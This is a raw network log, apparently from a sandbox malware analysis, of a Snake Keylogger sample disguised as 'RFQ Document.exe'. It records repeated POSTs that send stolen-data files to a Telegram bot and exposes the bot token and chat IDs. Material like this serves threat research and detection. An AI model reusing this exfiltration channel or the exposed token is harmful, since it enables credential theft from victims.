{"ok":true,"result":{"message_id":12659,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808718,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.2.4	49853	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:38 UTC	123	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cc403d3d Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:38 UTC	123	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 34 30 33 64 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cc403d3dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:38 UTC	123	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:38 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:38 UTC	124	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12660,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808718,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.2.4	49854	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:38 UTC	124	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cc65c603 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:38 UTC	125	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 36 35 63 36 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cc65c603Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:38 UTC	125	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:38 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:38 UTC	125	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12661,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808718,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
79	192.168.2.4	49855	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:38 UTC	126	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cc7b3b50 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:38 UTC	126	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 37 62 33 62 35 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cc7b3b50Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:38 UTC	127	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:38 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:38 UTC	127	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12662,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808718,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49782	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:22 UTC	12	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255c2ce142c Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:22 UTC	12	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 32 63 65 31 34 32 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255c2ce142cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:22 UTC	13	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:22 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:22 UTC	13	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 35 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 30 32 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12587,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808702,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
80	192.168.2.4	49856	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:38 UTC	128	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cc9a3987 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:38 UTC	128	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 39 61 33 39 38 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255cc9a3987Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:38 UTC	128	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:38 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:38 UTC	129	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12663,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808718,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
81	192.168.2.4	49857	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:38 UTC	129	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ccb9372e Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:38 UTC	129	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 62 39 33 37 32 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ccb9372eContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:39 UTC	130	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:39 GMT Content-Type: application/json Content-Length: 520 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:39 UTC	130	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 38 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12664,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808718,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
82	192.168.2.4	49858	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:39 UTC	131	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255ccd10e90 Host: api.telegram.org Content-Length: 407
2021-09-28 05:58:39 UTC	131	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 63 63 64 31 30 65 39 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a Data Ascii: --------------------------8d98255ccd10e90Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW \| user \| Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
2021-09-28 05:58:39 UTC	131	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 28 Sep 2021 05:58:39 GMT Content-Type: application/json Content-Length: 521 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2021-09-28 05:58:39 UTC	132	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 36 36 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 31 39 2c 22 64 Data Ascii: {"ok":true,"result":{"message_id":12665,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808719,"d

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
83	192.168.2.4	49859	149.154.167.220	443	C:\Users\user\Desktop\RFQ Document.exe

Timestamp	kBytes transferred	Direction	Data
2021-09-28 05:58:39 UTC	132	OUT	POST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8d98255cce684f4 Host: api.telegram.org Content-Length: 407
